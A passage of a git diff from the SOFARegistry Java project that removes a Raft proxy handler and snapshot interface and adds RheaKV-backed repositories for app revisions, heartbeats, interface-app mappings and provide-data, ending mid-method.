KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; - -import java.lang.invoke.MethodHandle; -import java.lang.invoke.MethodHandles; -import java.lang.reflect.InvocationHandler; -import java.lang.reflect.Method; - -/** - * - * @author shangyu.wh - * @version $Id: ProxyHandler.java, v 0.1 2018-05-23 12:19 shangyu.wh Exp $ - */ -public class ProxyHandler implements InvocationHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(ProxyHandler.class); - - private final Class interfaceType; - - private final String serviceId; - - private final RaftClient client; - - /** - * constructor - * @param interfaceType - * @param serviceId - * @param client - */ - public ProxyHandler(Class interfaceType, String serviceId, RaftClient client) { - this.interfaceType = interfaceType; - this.serviceId = serviceId; - this.client = client; - } - - @Override - public Object invoke(Object proxy, Method method, Object[] args) { - try { - - ProcessRequest request = new ProcessRequest(); - request.setMethodArgSigs(createParamSignature(method.getParameterTypes())); - request.setMethodName(method.getName()); - request.setMethodArgs(args); - - request.setServiceName(serviceId); - - if (Processor.getInstance().isLeaderReadMethod(method)) { - return doInvokeMethod(request); - } - return client.sendRequest(request); - } catch (Throwable e) { - LOGGER.error("Proxy invoke interface {} method {} got error!", interfaceType.getName(), - method.getName(), e); - throw new RuntimeException(String.format( - "Proxy invoke interface %s method %s got error!", interfaceType.getName(), - method.getName()), e); - } - } - - private Object doInvokeMethod(ProcessRequest request) { - try { - - Object target = Processor.getInstance().getWorkers().get(serviceId); - if (target == null) { - LOGGER.error("Can not find service {} from process!", serviceId); - throw new RuntimeException(String.format("Can not find service %s from process!", - serviceId)); - } - - Method method = Processor.getInstance().getWorkMethod(request); - - MethodHandle methodHandle = MethodHandles.lookup().unreflect(method); - return methodHandle.bindTo(target).invokeWithArguments(request.getMethodArgs()); - } catch (Throwable e) { - LOGGER.error("Directly invoke read only service {} method {} error!", - request.getServiceName(), request.getMethodName(), e); - throw new RuntimeException(String.format( - "Directly invoke read only service %s method %s error!", request.getServiceName(), - request.getMethodName()), e); - } - } - - private String[] createParamSignature(Class[] args) { - if (args == null || args.length == 0) { - return new String[] {}; - } - String[] paramSig = new String[args.length]; - for (int x = 0; x < args.length; x++) { - paramSig[x] = args[x].getName(); - } - return paramSig; - } - -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/SnapshotProcess.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/SnapshotProcess.java deleted file mode 100644 index c02f5d4d5..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/processor/SnapshotProcess.java +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.processor; - -import java.util.Set; - -/** - * - * @author shangyu.wh - * @version $Id: SnapshortProcess.java, v 0.1 2018-05-29 11:53 shangyu.wh Exp $ - */ -public interface SnapshotProcess { - - boolean save(String path); - - boolean load(String path); - - SnapshotProcess copy(); - - Set getSnapshotFileNames(); -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionHeartbeatRaftRepository.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionHeartbeatRaftRepository.java new file mode 100644 index 000000000..0ed531e0d --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionHeartbeatRaftRepository.java @@ -0,0 +1,172 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.repository.impl; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.config.MetadataConfig; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import com.alipay.sofa.registry.util.BatchCallableRunnable; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.SingleFlight; +import com.google.common.collect.Sets; +import org.apache.commons.lang.time.DateUtils; +import org.springframework.beans.factory.annotation.Autowired; + +import javax.annotation.PostConstruct; +import java.util.*; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-07-05 11:45 + **/ +public class AppRevisionHeartbeatRaftRepository implements AppRevisionHeartbeatRepository { + private static final Logger LOG = LoggerFactory.getLogger(AppRevisionHeartbeatRaftRepository.class); + + @Autowired + private AppRevisionRaftRepository appRevisionRaftRepository; + + @Autowired + private DefaultCommonConfig defaultCommonConfig; + + @Autowired + private RheaKVStore rheaKVStore; + +// @Autowired +// private AppRevisionHeartbeatBatchCallable appRevisionHeartbeatBatchCallable; + + private SingleFlight singleFlight = new SingleFlight(); + + private static final Integer heartbeatCheckerSize = 1000; + + private static final String APP_REVISION="AppRevision"; + + /**dataCenter,AppRevision*/ + private Map appRevisionMap=new ConcurrentHashMap<>(); + + @Override + public void doAppRevisionHeartbeat() { + try { + singleFlight.execute( + "app_revision_heartbeat", + () -> { + //查询数据库 + byte[] appRevisionBytes = rheaKVStore.bGet(APP_REVISION); + Map appRevisionInfoMap = CommandCodec.decodeCommand(appRevisionBytes, appRevisionMap.getClass()); + + //获取appRevision列表 + Set heartbeatSet = + appRevisionRaftRepository + .getHeartbeatSet() + .getAndSet(new ConcurrentHashMap<>().newKeySet()); + + //更新lastTime + for (String revision : heartbeatSet) { + AppRevision appRevision = appRevisionInfoMap.get(defaultCommonConfig.getClusterId()); + if(appRevision.getRevision().equals(revision)){ + appRevision.setLastHeartbeat(new Date()); + appRevisionInfoMap.put(defaultCommonConfig.getClusterId(),appRevision); + } + } + return null; + }); + } catch (Exception e) { + LOG.error("app_revision heartbeat error.", e); + } + + } + + @Override + public void doHeartbeatCacheChecker() { + try{ + //获取数据库数据 + byte[] appRevisionBytes = rheaKVStore.bGet(APP_REVISION); + Map appRevisionInfoMap = CommandCodec.decodeCommand(appRevisionBytes, appRevisionMap.getClass()); + + Set heartbeatSet = appRevisionRaftRepository.getHeartbeatSet().get(); + List revisions = new ArrayList(heartbeatSet); + List exists = new ArrayList<>(); + int round = MathUtils.divideCeil(revisions.size(), heartbeatCheckerSize); + for (int i = 0; i < round; i++) { + int start = i * heartbeatCheckerSize; + int end = + start + heartbeatCheckerSize < revisions.size() + ? start + heartbeatCheckerSize + : revisions.size(); + String revision=null ; + List subRevisions = revisions.subList(start, end); + if(appRevisionInfoMap.get(defaultCommonConfig.getClusterId())!=null){ + revision = appRevisionInfoMap.get(defaultCommonConfig.getClusterId()).getRevision(); + } + if(subRevisions!=null && subRevisions.size()>0){ + if(subRevisions.contains(revision)){ + exists.add(revision); + } + } + + Sets.SetView difference = Sets.difference(new HashSet<>(revisions), new HashSet<>(exists)); + LOG.info("[doHeartbeatCacheChecker] reduces heartbeat size: {}", difference.size()); + appRevisionRaftRepository.invalidateHeartbeat(difference); + + } + }catch (Exception e){ + LOG.error("app_revision heartbeat cache checker error.", e); + } + } + + @Override + public void doAppRevisionGc(int silenceHour) { + try { + singleFlight.execute( + "app_revision_gc", + () -> { + Date date = DateUtils.addHours(new Date(), -silenceHour); + AppRevision appRevision=null; + //获取数据库数据 + byte[] appRevisionBytes = rheaKVStore.bGet(APP_REVISION); + try{ + appRevisionMap = CommandCodec.decodeCommand(appRevisionBytes, appRevisionMap.getClass()); + }catch (NullPointerException e){ + LOG.info("APP_REVISION RheaKV is empty"); + } + try{ + appRevision = appRevisionMap.get(defaultCommonConfig.getClusterId()); + //System.out.println(appRevision); + }catch (NullPointerException e){ + LOG.info("dataCenter : {} , without AppRevision",defaultCommonConfig.getClusterId()); + } + + if(appRevision.getLastHeartbeat().before(date)){ + if (LOG.isInfoEnabled()) { + LOG.info("app_revision tobe gc dataCenter: {}, revision: {}", defaultCommonConfig.getClusterId(),appRevision.getRevision()); + } + appRevisionMap.remove(defaultCommonConfig.getClusterId()); + + } + return null; + }); + rheaKVStore.bPut(APP_REVISION,CommandCodec.encodeCommand(appRevisionMap)); + } catch (Exception e) { + LOG.error("app_revision gc error.", e); + } + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionRaftRepository.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionRaftRepository.java new file mode 100644 index 000000000..78df4cbf3 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/AppRevisionRaftRepository.java @@ -0,0 +1,195 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.repository.impl; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.domain.InterfaceAppsDomain; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import com.alipay.sofa.registry.util.TimestampUtil; +import com.sun.xml.internal.bind.v2.runtime.output.StAXExStreamWriterOutput; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.Assert; + +import javax.annotation.Resource; +import java.sql.Timestamp; +import java.util.*; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.atomic.AtomicReference; +import java.util.stream.Collectors; + +/** + * @author : xingpeng + * @date : 2021-07-05 11:45 + **/ +public class AppRevisionRaftRepository implements AppRevisionRepository { + private static final Logger LOG = LoggerFactory.getLogger(AppRevisionRaftRepository.class); + + @Autowired + private RheaKVStore rheaKVStore; + + private static final String APP_REVISION="AppRevision"; + + private static final String INTERFACE_APPS="InterfaceApps"; + + /**dataCenter,AppRevision*/ + private Map appRevisionMap=new ConcurrentHashMap<>(); + + /** map: */ + private final AtomicReference heartbeatSet = + new AtomicReference<>(); + + /** map: */ + protected Map interfaceAppsMap = new ConcurrentHashMap<>(); + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + @Resource + private InterfaceAppsRaftRepository interfaceAppsRaftRepository; + + public AppRevisionRaftRepository() { + heartbeatSet.set(new ConcurrentHashMap<>().newKeySet()); + } + + @Override + public void register(AppRevision appRevision) { + if (appRevision == null) { + throw new RuntimeException("raft register app revision error, appRevision is null."); + } + AppRevision appRevisionInfo=null; + byte[] appRevisionMapBytes = rheaKVStore.bGet(APP_REVISION); + byte[] interfaceAppsBytes = rheaKVStore.bGet(INTERFACE_APPS); + //查询集群appRevision + try { + appRevisionMap = CommandCodec.decodeCommand(appRevisionMapBytes, appRevisionMap.getClass()); + interfaceAppsMap=CommandCodec.decodeCommand(interfaceAppsBytes,interfaceAppsMap.getClass()); + appRevisionInfo = appRevisionMap.get(defaultCommonConfig.getClusterId()); + }catch (NullPointerException e){ + LOG.info("APP_REVISION RheaKV is empty"); + } + if(appRevisionInfo!=null && appRevisionInfo.getRevision().equals(appRevision.getRevision()) ){ + return; + } + //注册接口 + //System.out.println(appRevision.getInterfaceMap().keySet().size()); + for(String interfaceName:appRevision.getInterfaceMap().keySet()){ + //System.out.println(appRevision.getAppName()); + InterfaceAppsDomain interfaceAppsDomain = new InterfaceAppsDomain(defaultCommonConfig.getClusterId(), + interfaceName, + appRevision.getAppName(), + new Timestamp(System.currentTimeMillis()) + ); + //判断是否存在 +// System.out.println("在for中执行"); +// System.out.println("创建interfaceAppsDomain: "+interfaceAppsDomain); + interfaceAppsMap.put(interfaceName,interfaceAppsDomain); + } + +// System.out.println(interfaceAppsMap.size()); +// for(Map.Entry i:interfaceAppsMap.entrySet()){ +// System.out.println(i.getKey()+"------"+i.getValue()); +// } + + //插入新AppRevision + //设置新的dataCenter与LastHeartbeat + appRevision.setDataCenter(defaultCommonConfig.getClusterId()); + appRevision.setLastHeartbeat(new Date()); + appRevisionMap.put(defaultCommonConfig.getClusterId(),appRevision); + rheaKVStore.bPut(INTERFACE_APPS,CommandCodec.encodeCommand(interfaceAppsMap)); + rheaKVStore.bPut(APP_REVISION,CommandCodec.encodeCommand(appRevisionMap)); + } + + @Override + public void refresh() { + byte[] interfaceAppsBytes = rheaKVStore.bGet(INTERFACE_APPS); + List collects = new ArrayList<>(); + try{ + interfaceAppsMap = CommandCodec.decodeCommand(interfaceAppsBytes, interfaceAppsMap.getClass()); + }catch (NullPointerException e){ + LOG.info("INTERFACE_APPS RheaKV is empty"); + } + for(Map.Entry interfaceApps:interfaceAppsMap.entrySet()){ + InterfaceAppsDomain value = interfaceApps.getValue(); + if(value.getDataCenter().equals(defaultCommonConfig.getClusterId())){ + collects.add(value); + } + } + //更新interface和app + //更新rheakv + for(InterfaceAppsDomain collect : collects){ + //System.out.println(collect); + interfaceAppsRaftRepository.triggerRefreshCache(collect); + rheaKVStore.bPut(INTERFACE_APPS,CommandCodec.encodeCommand(interfaceAppsRaftRepository.interfaceAppsMap)); + } + } + + @Override + public AppRevision queryRevision(String revision) { + byte[] appRevisionMapBytes = rheaKVStore.bGet(APP_REVISION); + try{ + appRevisionMap = CommandCodec.decodeCommand(appRevisionMapBytes, appRevisionMap.getClass()); + }catch(NullPointerException e){ + LOG.info("APP_REVISION RheaKV is empty"); + } + for(Map.Entry values : appRevisionMap.entrySet()){ + AppRevision value = values.getValue(); + if(value.getRevision().equals(revision)) { + return value; + } + } + LOG.info("RheaKV query revision failed, revision: {} not exist in db", revision); + return null; + } + + @Override + public boolean heartbeat(String revision) { + if (heartbeatSet.get().contains(revision)) { + return true; + } + byte[] bytes = rheaKVStore.bGet(APP_REVISION); + Map appRevisionInfoMap = CommandCodec.decodeCommand(bytes, appRevisionMap.getClass()); + AppRevision appRevision = appRevisionInfoMap.get(defaultCommonConfig.getClusterId()); + + if(appRevision!=null && appRevision.getRevision().equals(revision)){ + heartbeatSet.get().add(revision); + return true; + } + return false; + } + + /** + * Getter method for property heartbeatMap. + * + * @return property value of heartbeatMap + */ + public AtomicReference getHeartbeatSet() { + return heartbeatSet; + } + + public void invalidateHeartbeat(Collection keys) { + if (LOG.isInfoEnabled()) { + LOG.info("Invalidating heartbeat cache keys: {}", keys); + } + heartbeatSet.get().removeAll(keys); + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/InterfaceAppsRaftRepository.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/InterfaceAppsRaftRepository.java new file mode 100644 index 000000000..1b3998b12 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/InterfaceAppsRaftRepository.java @@ -0,0 +1,190 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.repository.impl; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.domain.InterfaceAppsDomain; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.util.TimestampUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Sets; +import org.springframework.beans.factory.annotation.Autowired; + +import java.sql.Timestamp; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-07-05 11:45 + **/ +public class InterfaceAppsRaftRepository implements InterfaceAppsRepository { + protected static final Logger LOG = LoggerFactory.getLogger(InterfaceAppsRaftRepository.class); + + @Autowired + private RheaKVStore rheaKVStore; + + private static final String INTERFACE_APPS="InterfaceApps"; + + /** map: */ + protected Map interfaceAppsMap = new ConcurrentHashMap<>(); + + @Autowired + private DefaultCommonConfig defaultCommonConfig; + + @Override + public void loadMetadata() { + // FIXME + } + + @Override + public InterfaceMapping getAppNames(String dataInfoId) { + byte[] interfaceAppsBytes = rheaKVStore.bGet(INTERFACE_APPS); + InterfaceMapping appNames = null; + InterfaceAppsDomain interfaceAppsDomain = null; + InterfaceAppsDomain newInterface = null; + + try{ + interfaceAppsMap = CommandCodec.decodeCommand(interfaceAppsBytes, interfaceAppsMap.getClass()); + interfaceAppsDomain = interfaceAppsMap.get(dataInfoId); + }catch (NullPointerException e) { + LOG.info("INTERFACE_APPS RheaKV is empty"); + } + try{ + appNames = new InterfaceMapping(interfaceAppsDomain.getNanosVersion(),interfaceAppsDomain.getApps()); + }catch (NullPointerException e){ + //LOG.info("NanosVersion :{} ,Apps is null",interfaceAppsDomain.getNanosVersion()); + } + + //存在返回app集合 + if(appNames!=null){ + return appNames; + } + + //插入新interface并返回interfacemapping + appNames=new InterfaceMapping(-1); + if(interfaceAppsDomain!=null){ + interfaceAppsDomain.setGmtModify(new Timestamp(System.currentTimeMillis())); + newInterface = new InterfaceAppsDomain(defaultCommonConfig.getClusterId(), + dataInfoId, + interfaceAppsDomain.getAppName(), + interfaceAppsDomain.isReference(), + interfaceAppsDomain.getHashcode(), + interfaceAppsDomain.getGmtModify(), + appNames.getNanosVersion(), + appNames.getApps() + ); + LOG.info("update interfaceMapping {}, {}", dataInfoId, appNames); + }else{ + newInterface = new InterfaceAppsDomain(defaultCommonConfig.getClusterId(), + dataInfoId, + appNames.getNanosVersion(), + appNames.getApps() + ); + } + + interfaceAppsMap.put(dataInfoId, newInterface); + rheaKVStore.bPut(INTERFACE_APPS,CommandCodec.encodeCommand(interfaceAppsMap)); + return appNames; + } + + /** refresh interfaceNames index */ + public synchronized void triggerRefreshCache(InterfaceAppsDomain domain) { + InterfaceAppsDomain interfaceMapping = interfaceAppsMap.get(domain.getInterfaceName()); + //System.out.println(interfaceMapping); + if (interfaceMapping != null) { + InterfaceMapping map = new InterfaceMapping(interfaceMapping.getNanosVersion(),interfaceMapping.getApps()); + final long nanosLong = TimestampUtil.getNanosLong(domain.getGmtModify()); + if (map == null) { + if (domain.isReference()) { + map = new InterfaceMapping(nanosLong, domain.getAppName()); + } else { + map = new InterfaceMapping(nanosLong); + } + if (LOG.isInfoEnabled()) { + LOG.info( + "refresh interface: {}, ref: {}, app: {}, mapping: {}", + domain.getInterfaceName(), + domain.isReference(), + domain.getAppName(), + map); + } + domain.setGmtModify(new Timestamp(System.currentTimeMillis())); + InterfaceAppsDomain interfaceAppsDomain=new InterfaceAppsDomain( + domain.getDataCenter(), + domain.getInterfaceName(), + domain.getAppName(), + domain.isReference(), + domain.getHashcode(), + domain.getGmtModify(), + map.getNanosVersion(), + map.getApps() + ); + interfaceAppsMap.put(domain.getInterfaceName(),interfaceAppsDomain); + return; + } + //判断版本信息 + if(nanosLong>map.getNanosVersion()){ + InterfaceMapping newMapping=null; + //判断关联 + if(domain.isReference()){ + newMapping=new InterfaceMapping(nanosLong,map.getApps(),domain.getAppName()); + }else{ + Set prev = Sets.newHashSet(map.getApps()); + prev.remove(domain.getAppName()); + newMapping=new InterfaceMapping(nanosLong,prev,domain.getAppName()); + } + if(LOG.isInfoEnabled()){ + LOG.info( + "update interface mapping: {}, ref: {}, app: {}, newMapping: {}, oldMapping: {}", + domain.getInterfaceName(), + domain.isReference(), + domain.getAppName(), + newMapping, + map); + } + domain.setGmtModify(new Timestamp(System.currentTimeMillis())); + InterfaceAppsDomain newInterfaceAppsDomain=new InterfaceAppsDomain( + domain.getDataCenter(), + domain.getInterfaceName(), + domain.getAppName(), + domain.isReference(), + domain.getHashcode(), + domain.getGmtModify(), + newMapping.getNanosVersion(), + newMapping.getApps() + ); + interfaceAppsMap.put(domain.getInterfaceName(),newInterfaceAppsDomain); + }else{ + LOG.error( + "[IgnoreUpdateCache]ignored refresh index, interfac={}, newVersion={} , current mapping={}", + domain.getInterfaceName(), + nanosLong, + map); + } + }else{ + interfaceAppsMap.put(domain.getInterfaceName(),domain); + } + } + +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/ProvideDataRaftRepository.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/ProvideDataRaftRepository.java new file mode 100644 index 000000000..374c1d63d --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/repository/impl/ProvideDataRaftRepository.java @@ -0,0 +1,178 @@ +package com.alipay.sofa.registry.jraft.repository.impl; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.domain.ProvideDataDomain; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import org.springframework.beans.factory.annotation.Autowired; + +import javax.validation.constraints.Null; +import java.util.ArrayList; +import java.util.Collection; +import java.util.Date; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.atomic.AtomicInteger; + +/** + * @author : xingpeng + * @date : 2021-07-30 20:26 + **/ +public class ProvideDataRaftRepository implements ProvideDataRepository { + private static final Logger LOG = LoggerFactory.getLogger("META-PROVIDEDATA", "[ProvideData]"); + + @Autowired + private RheaKVStore rheaKVStore; + + @Autowired + private DefaultCommonConfig defaultCommonConfig; + + private static final String PROVIDE_DATA="ProvideData"; + + /** Map */ + private Map provideDataMap=new ConcurrentHashMap<>(); + + @Override + public boolean put(PersistenceData persistenceData, long expectVersion) { + byte[] provideDataBytes = rheaKVStore.bGet(PROVIDE_DATA); + ProvideDataDomain provideDataDomain=null; + Integer count=0; + try{ + provideDataMap = CommandCodec.decodeCommand(provideDataBytes, provideDataMap.getClass()); + provideDataDomain = provideDataMap.get(defaultCommonConfig.getClusterId()); + }catch(NullPointerException e){ + LOG.info("PROVIDE_DATA RheaKV is empty"); + } + + String dataKey= PersistenceDataBuilder.getDataInfoId(persistenceData); + ProvideDataDomain newProvideDataDomain=new ProvideDataDomain(defaultCommonConfig.getClusterId(), + dataKey, + persistenceData.getData(), + new Date(), + persistenceData.getVersion() + ); + + if(provideDataDomain==null){ + provideDataMap.put(defaultCommonConfig.getClusterId(),newProvideDataDomain); + count++; + if (LOG.isInfoEnabled()) { + LOG.info("save provideData: {}", persistenceData); + } + }else{ + //更新 + //System.out.println("进入更新"); + for(Map.Entry map:provideDataMap.entrySet()){ + if(map.getValue().getDataKey()==dataKey && map.getValue().getDataVersion()==expectVersion){ + map.getValue().setGmtModified(new Date()); + map.getValue().setDataVersion(newProvideDataDomain.getDataVersion()); + map.getValue().setDataValue(newProvideDataDomain.getDataValue()); + count++; + //System.out.println(count.get()); + if (LOG.isInfoEnabled()) { + LOG.info( + "update provideData: {}, expectVersion: {}", + newProvideDataDomain, + expectVersion + ); + } + } + } + } + if(count==0){ + provideDataMap.put(defaultCommonConfig.getClusterId(),newProvideDataDomain); + count++; + } + + //存储到内存数据库 + rheaKVStore.bPut(PROVIDE_DATA,CommandCodec.encodeCommand(provideDataMap)); + + return count>0; + } + + @Override + public PersistenceData get(String key) { + byte[] provideDataBytes = rheaKVStore.bGet(PROVIDE_DATA); + ProvideDataDomain provideData=null; + try{ + provideDataMap = CommandCodec.decodeCommand(provideDataBytes, provideDataMap.getClass()); + provideData = provideDataMap.get(defaultCommonConfig.getClusterId()); + }catch(NullPointerException e){ + LOG.info("PROVIDE_DATA RheaKV is empty"); + } + if(provideData==null){ + return null; + } + DataInfo dataInfo = DataInfo.valueOf(provideData.getDataKey()); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setDataId(dataInfo.getDataId()); + persistenceData.setGroup(dataInfo.getGroup()); + persistenceData.setInstanceId(dataInfo.getInstanceId()); + persistenceData.setData(provideData.getDataValue()); + persistenceData.setVersion(provideData.getDataVersion()); + return persistenceData; + } + + @Override + public boolean remove(String key, long version) { + byte[] provideDataBytes = rheaKVStore.bGet(PROVIDE_DATA); + ProvideDataDomain provideDataDomain=null; + try{ + provideDataMap = CommandCodec.decodeCommand(provideDataBytes, provideDataMap.getClass()); + provideDataDomain = provideDataMap.get(defaultCommonConfig.getClusterId()); + }catch(NullPointerException e){ + LOG.info("PROVIDE_DATA RheaKV is empty"); + } + if(provideDataDomain==null){ + return false; + }else{ + if(provideDataDomain.getDataKey().equals(key) && provideDataDomain.getDataVersion()==version){ + provideDataMap.remove(defaultCommonConfig.getClusterId()); + //存储到内存数据库 + rheaKVStore.bPut(PROVIDE_DATA,CommandCodec.encodeCommand(provideDataMap)); + if (LOG.isInfoEnabled()) { + LOG.info( + "remove provideData, dataCenter: {}, key: {}, version: {}", + defaultCommonConfig.getClusterId(), + key, + version); + } + return true; + } + } + return false; + } + + @Override + public Collection getAll() { + byte[] provideDataBytes = rheaKVStore.bGet(PROVIDE_DATA); + Collection responses = new ArrayList<>(); + ProvideDataDomain provideDataDomain=null; + try{ + provideDataMap = CommandCodec.decodeCommand(provideDataBytes, provideDataMap.getClass()); + provideDataDomain = provideDataMap.get(defaultCommonConfig.getClusterId()); + }catch (NullPointerException e){ + LOG.info("PROVIDE_DATA RheaKV is empty"); + } + + if(provideDataDomain==null){ + return null; + }else{ + DataInfo dataInfo = DataInfo.valueOf(provideDataDomain.getDataKey()); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setDataId(dataInfo.getDataId()); + persistenceData.setGroup(dataInfo.getGroup()); + persistenceData.setInstanceId(dataInfo.getInstanceId()); + persistenceData.setData(provideDataDomain.getDataValue()); + persistenceData.setVersion(provideDataDomain.getDataVersion()); + + responses.add(persistenceData); + } + return responses; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionRegistry.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionRegistry.java new file mode 100644 index 000000000..3de0ee491 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionRegistry.java @@ -0,0 +1,47 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.revision; + +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +public class AppRevisionRegistry { + @Autowired private AppRevisionService appRevisionService; + private static final Logger LOGGER = LoggerFactory.getLogger(AppRevisionService.class); + + public void register(AppRevision appRevision) { + if 